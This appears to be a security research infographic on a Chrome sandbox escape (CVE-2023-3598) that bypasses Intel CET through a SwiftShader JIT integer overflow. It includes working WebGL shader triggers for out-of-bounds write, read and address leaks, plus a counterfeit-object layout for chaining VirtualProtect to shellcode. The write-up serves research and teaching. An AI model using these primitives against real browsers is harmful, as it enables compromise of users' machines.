Bypassing Intel CET Shadow Stack

An infographic detailing the CVE-2023-3598 "SwiftZero" Chrome sandbox escape which bypasses Intel CET Shadow Stack on Windows x64.

Intel CET ShadowStack

A Hardware Defense

Intel's Control-flow Enforcement Technology (CET) is a hardware-level defense. Its key feature for this talk is the Shadow Stack, a CPU-protected stack that creates a secure record of return addresses to prevent backward-edge control flow attacks.

The Audit

On every function return, the CPU compares the return address on the normal stack with the one on the Shadow Stack. If they mismatch, it triggers a hardware fault, terminating the process. This is designed to make return-oriented programming (ROP) attacks impossible.

Normal Function Call with CET

1. Example Code


void foo() { ... }

void main() {
  foo(); // <-- CALL
  // <-- return addr is here
}

2. Resulting Stacks

Call Stack

...

return addr

foo() stack frame

Shadow Stack

...

return addr

The call instruction pushes the return address to both stacks simultaneously.

3. When Return Addresses Mismatch

Call Stack

...

corrupted addr

foo() stack frame

Shadow Stack

...

real return addr

#CP Fault: Process Terminated

CPU detects mismatch during RET instruction and triggers a hardware fault.

How CET Defeats ROP

1. ROP Gadget

pop rcx
ret

A typical gadget found in legitimate code.

2. How ROP Fails

Call Stack

ROP gadget addr

value for RCX

Shadow Stack

...

legitimate Addr

MISMATCH: #CP Fault on ret

How CET Hinders JOP

1. JOP Gadget

mov rcx, [rbx]
jmp rcx ; <-- VirtualProtect

A gadget to perform an action and jump.

2. How JOP Can Fail

Hijacks control to a JOP gadget

↓

JOP gadget jumps to VirtualProtect

↓

VirtualProtect finishes and executes ret

Shadow Stack still expects the original return address.

↓

MISMATCH: #CP Fault on ret

How CET Hinders COP

1. COP Gadget

; COP gadget found in real code
mov rdx, [rax+0x20]    ; Load VirtualProtect addr
call rdx               ; Call VirtualProtect - SUCCESS!
mov rbx, [rax+0x30]    ; ← VirtualProtect returns HERE
add rsp, 0x28          ; Unwanted stack manipulation
pop r14                ; Destroys register state

Real gadgets have problematic instructions that destroy control flow.

2. How COP Can Fail

Attacker controls [rax+0x20] = &VirtualProtect

↓

call rdx → VirtualProtect()

Shadow Stack: must return to line 4

↓

VirtualProtect() executes & returns

↓

Returns to line 4 (unwanted!)

Stack manipulation destroys control

↓

add rsp, 0x28; pop r14

↓

Control flow completely lost

COP can call one function, but can't skip the destructive instructions that follow.

The Road to CET

2016

Intel Publishes CET Specs

The initial specification is released to give the software ecosystem time to prepare.

2020

Hardware & OS Support Arrives

Intel releases 11th Gen "Tiger Lake" CPUs with CET. Microsoft enables "Hardware-enforced Stack Protection" in Windows 10 (20H1).

2021

Browser Adoption Begins

Google starts enabling CET support for Chrome 90.

2022

Protection Extends to the Core

Microsoft introduces Kernel-mode Hardware-enforced Stack Protection in Windows 11 (22H2).

CET's deployment was a multi-year collaboration between hardware, OS, and application vendors.

Windows' Compatibility Mode

Windows doesn't just turn CET on. It uses a flexible system called "Hardware-enforced Stack Protection" (HSP). This compatibility mode introduces specific rules that an attacker can potentially exploit.

Kernel Fault Investigation Logic

#CP Fault Triggered

CPU detects mismatch

↓

Kernel Investigates

KiControlProtectionFault

ALLOW Cases

Return address found anywhere on the ShadowStack?

ALLOW

Legitimate return

Return from non-CETCOMPAT dynamic code?

ALLOW

JIT/interpreted code exemption

Return from non-CETCOMPAT module?

ALLOW

Legacy compatibility

TERMINATE Cases

Return from CETCOMPAT code without valid ShadowStack entry?

TERMINATE

CET violation detected

Return from CETCOMPAT module with mismatch?

TERMINATE

CET violation detected

Key Insight

The kernel's compatibility exemptions for non-CETCOMPAT dynamic code (like JIT-compiled shaders) create a bypass opportunity. SwiftShader's JIT code is exempt from CET enforcement, allowing our exploit to work.

The SwiftZero Bug (CVE-2023-3598)

The vulnerability (CVE-2023-3598) lies within SwiftShader's JIT compiler. A 32-bit integer overflow when calculating stack space for large shader variables leads to a classic stack-based buffer overflow.

Learn more

The Vulnerable Code: Cfg::sortAndCombineAllocas

void Cfg::sortAndCombineAllocas(CfgVector<InstAlloca *> &Allocas,
                                uint32_t CombinedAlignment, InstList &Insts,
                                AllocaBaseVariableType BaseVariableType) {
  if (Allocas.empty())
    return;
    ...
  uint32_t CurrentOffset = 0;  // 32-bit integer can overflow!
  CfgVector<int32_t> Offsets;
  
  // The vulnerable loop:
  for (Inst *Instr : Allocas) {
    auto *Alloca = llvm::cast<InstAlloca>(Instr);
    uint32_t Alignment = std::max(Alloca->getAlignInBytes(), 1u);
    auto *ConstSize = 
        llvm::dyn_cast<ConstantInteger32>(Alloca->getSizeInBytes());
    // Size can be controlled by attacker via shader code
    uint32_t Size = Utils::applyAlignment(ConstSize->getValue(), Alignment);
    
    ...
    Offsets.push_back(...);
    CurrentOffset += Size;  // INTEGER OVERFLOW HERE!
  }
  
  // Round the offset up to the alignment to determine the final allocation size
  uint32_t TotalSize = Utils::applyAlignment(CurrentOffset, CombinedAlignment);
  ...
}

Line 7: CurrentOffset is a 32-bit unsigned integer that can overflow

Line 17: Size can be controlled by attacker via shader code

Line 21: Integer overflow occurs here when CurrentOffset wraps around

Lines 25: The overflowed value leads to an undersized allocation

You can craft shader variables large enough to cause CurrentOffset to wrap around, resulting in an undersized stack frame allocation.

View the full source code on GitHub

Compiling a Shader

(() => {
    // Create a temporary canvas to get a WebGL2 context
    const canvas = document.createElement('canvas');
    const gl = canvas.getContext('webgl2');

    if (!gl) {
        console.error("WebGL 2 is not available on your browser.");
        return;
    }

    // A simple, valid vertex shader
    const vsSource = `
        #version 300 es
        mat4 buf[0xffffff]; // Trigger the overflow in sortAndCombineAllocas
        void main() {
            buf[1][2][3]=uintBitsToFloat(0x41414141);
    }`;

    // --- The Compilation Process ---
    const shader = gl.createShader(gl.VERTEX_SHADER);
    gl.shaderSource(shader, vsSource);
    gl.compileShader(shader);

    // --- Check the Result ---
    if (gl.getShaderParameter(shader, gl.COMPILE_STATUS)) {
        console.log("Shader compiled successfully!");
    } else {
        console.error("Shader compilation failed:");
        console.error(gl.getShaderInfoLog(shader));
    }
})();

Client-Side Shader Compilation via WebGL2 using JavaScript

Line 14: Large array triggers integer overflow

Memory Corruption: Out-of-Bounds Write

1. Shader Code


#version 300 es
// Trigger integer overflow in sortAndCombineAllocas
mat4 buf[0xffffff];
void main() {
  // These writes go out of bounds
  buf[1][2][3]=uintBitsToFloat(0x41414141);
}

Line 4: Large array triggers integer overflow

Line 7: Out-of-bounds write overwrites return address

2. Result: Memory Corruption

Memory Layout

Target: 0x4141414141414141 (return addr)

...writable memory in between...

Array bounds end here

buf[0xffffff]

Reading past array bounds exposes sensitive stack data like the return addresses.

Information Disclosure: Out-of-Bounds Read

1. Shader Code


#version 300 es
// Trigger integer overflow in sortAndCombineAllocas
mat4 buf[0xfffffff];
flat out uint returnAddr;
void main() {
    // These reads go out of bounds
    returnAddr = floatBitsToUint(buf[1][2][3]);
}

Line 4: Large array triggers integer overflow

Line 8: Out-of-bounds read leaks return address

2. Result: Memory Disclosure

Memory Layout

Target: 0x7fff12345678 (return addr)

...readable memory in between...

Array bounds end here

buf[0xffffff]

Reading past array bounds exposes sensitive stack data like the return addresses.

Allocation and Leak Primitive

1. Shader Code


#version 300 es
mat4 buf[0xffffff];
flat out uint value;
layout(std140) uniform Buffer {
    uint value[0x100];
} buffer;
uint extra[0x10];

void main() {
    // Read and write operations to
    // avoid compiler optimizations
    buf[0][0][0] = uintBitsToFloat(buffer.value[0x1]);
    extra[0] = floatBitsToUint(buf[0][0][0]);
    buf[0][0][1] = uintBitsToFloat(extra[0]);
    // Leak the address of the Uniform Buffer Object
    value = floatBitsToUint(buf[0][2][2]);
}

Line 3: Large array triggers integer overflow

Line 13-15: Forces allocation of GlUniformBufferObject

Line 17: Leaks address of the Uniform Buffer Object

2. Result: Controlled Allocation

Memory Layout

Target: 0x23adfe0b100 (UBO addr)

...allocated memory in between...

Array bounds end here

buf[0xffffff]

The shader forces allocation of a GlUniformBufferObject and leaks its address for precise memory layout control.

The Exploitation Challenge

What We Have

• Read Primitive: Can leak stack addresses
• Write Primitive: Can write values to the stack
• Allocation Control: Can allocate data at known locations with controlled data
• IP Control: Can hijack the instruction pointer

What's Blocking Us

• CET defeats ROP: Shadow Stack validates returns
• CET hinders JOP: Jumping to code that still needs to return
• CET hinders COP: Difficult to maintain control of IP
• Need a new approach...

So what can we do?

We need a technique that:

1. Uses legitimate function calls
2. Leverages existing code
3. Works within CET's rules

Counterfeit Object-Oriented Programming

COOP: A code reuse attack targeting C++ applications, introduced by Felix Schuster in 2015.

Read the paper

C++ Classes: With vs Without Virtual Functions

1. Regular Class (No Virtuals)

class SimpleTimer {
    uint64_t deadline;
    bool active;
public:
    void Stop() { active = false; }  // Direct call
    void Run() { /* execute */ }     // Direct call
};

SimpleTimer* timer = new SimpleTimer();
timer->Stop();  // Direct function call

Lines 5-6: Regular functions use direct calls

SimpleTimer Object

0x00:deadline

0x08:active

No vtable pointer - just data members

2. Class with Virtual Functions

class Timer {
    void* vtable_ptr;  // Hidden, compiler-added
    uint64_t deadline;
public:
    virtual void Stop() { ... }  // Indirect call
    virtual void Run() { ... }   // Indirect call
};

Timer* timer = new Timer();
timer->Run();  // Virtual call through vtable

Lines 5-6: Virtual functions require vtable lookup

Timer Object

0x00:vtable_ptr

0x08:deadline

→

VTable

0x00:&Stop

0x08:&Run

Hidden vtable pointer added as first member

Key Difference: Function Call Assembly

Regular Function Call

call SimpleTimer::Stop  ; Direct call to known address

Virtual Function Call

mov rax, [rcx]       ; Load vtable pointer
call [rax+0x8]      ; Indirect call through vtable

Virtual functions enable polymorphism but introduce indirection that COOP exploits

The COOP Attack Principle

Counterfeit Objects Replace Real Ones

1. Control Object Layout

Attacker creates fake objects with controlled vtable pointers

Fake Timer Object

0x00:&FakeTimerVtable

0x08:data...

↓

FakeTimerVtable

0x00:&VirtualProtect

0x08:&Shellcode

2. Hijack Virtual Calls

Virtual function calls become attacker-controlled indirect calls

; timer->Stop() becomes:
mov rax, [rcx]       ; Load fake vtable
call [rax+0x00]      ; Calls VirtualProtect!

; timer->Run() becomes:
call [rax+0x08]      ; Executes shellcode!

3. Chain Functions

Chain existing functions together to achieve arbitrary behavior

// Original code path:
timer->Stop();  // 1. VirtualProtect
timer->Run();   // 2. Shellcode

// Result: Memory made executable,
// then shellcode runs

COOP bypasses CFI by using legitimate virtual call sites with counterfeit objects.

Finding the Perfect COOP Gadget

Requirements for Our Virtual Call Site

1. Make Memory Executable (GlUniformBufferObject)

First virtual call must be redirectable to VirtualProtect

2. Execute Our Code

Second virtual call must call our shellcode

The Perfect Target: DeadlineTimer::OnScheduledTaskInvoked

void DeadlineTimer::OnScheduledTaskInvoked() {
  DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_);
  DCHECK(!delayed_task_handle_.IsValid());

  // Make a local copy of the task to run. The Stop method will reset the
  // |user_task_| member.
  OnceClosure task = std::move(user_task_);
  Stop();                  // Virtual call #1 - Perfect for VirtualProtect
  std::move(task).Run();   // Virtual call #2 - Perfect for shellcode execution
}

Line 8: First virtual call - we'll hijack this to call VirtualProtect

Line 9: Second virtual call - we'll hijack this to execute our shellcode

Two sequential virtual calls with controlled object = perfect COOP gadget

View the full source code on Chromium

Disassembly Analysis: How The COOP Gadget Works

; DeadlineTimer::OnScheduledTaskInvoked()
; RCX = `this` pointer 
; (points to our FakeDeadlineTimer object)
push rsi
sub rsp, 20

; --- Part 1: Move the task object (std::move(user_task_)) ---
mov rax, [rcx]                       ; Load vtable pointer from our fake object
mov rsi, [rcx+0x48]                  ; Load 'user_task_' pointer (points to our payload)
mov [rcx+0x48], 0                    ; Zero out the pointer

; --- Part 2: Call Stop()            -> Hijacked to call VirtualProtect ---
mov rax, [rax+0x10]                  ; Load function pointer from fake vtable offset 0x10
                                     ; We placed &VirtualProtect here
call __guard_dispatch_icall_fptr
                                     ; CFG allows this - VirtualProtect is a valid target!
                                     ; Makes our shellcode executable

; --- Part 3: Call Run()             -> Hijacked to execute shellcode ---
mov rax, [rsi+8]                     ; Load &Payload from our counterfeit object

mov rcx, rsi                         ; Set 'this' pointer for the call
call __guard_dispatch_icall_fptr     ; Executes our shellcode

; --- Cleanup ---
test rsi, rsi
jne chrome.0x7~
add rsp, 0x20
pop rsi
ret

Line 8: Loads our controlled vtable pointer

Line 9: Loads user_task_ which points to our payload

Line 13: Loads VirtualProtect from our fake vtable

Line 13: Calls VirtualProtect

Line 20: Loads &Shellcode from our fake vtable

Line 23: Second hijacked call - calls our shellcode

Why This COOP Gadget is Perfect

• Two virtual calls in sequence - exactly what we need
• No validation between calls - both execute unconditionally
• CFG allows VirtualProtect as a valid call target
• The object pointer (RCX) is preserved between calls
• Common function in Chrome - likely to be present

Counterfeit Object Layout

FakeDeadlineTimer

0x00:&FakeVtable

0x08:padding

......

0x48:&FakeDeadlineTimer+0x50

0x50:0x0000000000000000

0x58:&Shellcode

0x60:Shellcode bytes...

Counterfeit object in GlUniformBuffer

→

FakeVtable

0x00:unused

0x08:unused

0x10:&VirtualProtect

0x18:unused

Stop() → VirtualProtect

Payload Structure

0x00:0x0000000000000000

0x08:&Shellcode

Run() → Shellcode

The object's user_task_ member (offset 0x48) points to offset 0x50, creating a self-referential structure that satisfies the COOP gadget's requirements.

Intel CET ShadowStack

A Hardware Defense

The Audit

Normal Function Call with CET

1. Example Code

2. Resulting Stacks

3. When Return Addresses Mismatch

How CET Defeats ROP

1. ROP Gadget

2. How ROP Fails

How CET Hinders JOP

1. JOP Gadget

2. How JOP Can Fail

How CET Hinders COP

1. COP Gadget

2. How COP Can Fail

The Road to CET

Windows' Compatibility Mode

Kernel Fault Investigation Logic

ALLOW Cases

TERMINATE Cases

Key Insight

The SwiftZero Bug (CVE-2023-3598)

The Vulnerable Code: Cfg::sortAndCombineAllocas

Compiling a Shader

Memory Corruption: Out-of-Bounds Write

1. Shader Code

2. Result: Memory Corruption

Information Disclosure: Out-of-Bounds Read

1. Shader Code

2. Result: Memory Disclosure

Allocation and Leak Primitive

1. Shader Code

2. Result: Controlled Allocation

The Exploitation Challenge

What We Have

What's Blocking Us

Counterfeit Object-Oriented Programming

C++ Classes: With vs Without Virtual Functions

1. Regular Class (No Virtuals)

2. Class with Virtual Functions

Key Difference: Function Call Assembly

The COOP Attack Principle

Counterfeit Objects Replace Real Ones

Finding the Perfect COOP Gadget

Requirements for Our Virtual Call Site

The Perfect Target: DeadlineTimer::OnScheduledTaskInvoked

Disassembly Analysis: How The COOP Gadget Works

Why This COOP Gadget is Perfect

Counterfeit Object Layout

Finding JOP Gadgets for Argument Setup

The Challenge: Setting VirtualProtect Arguments

VirtualProtect Parameters

What We Need

The Perfect JOP Chain

What we wish we could have found

Example Stack Layout for this

The Full Exploit Chain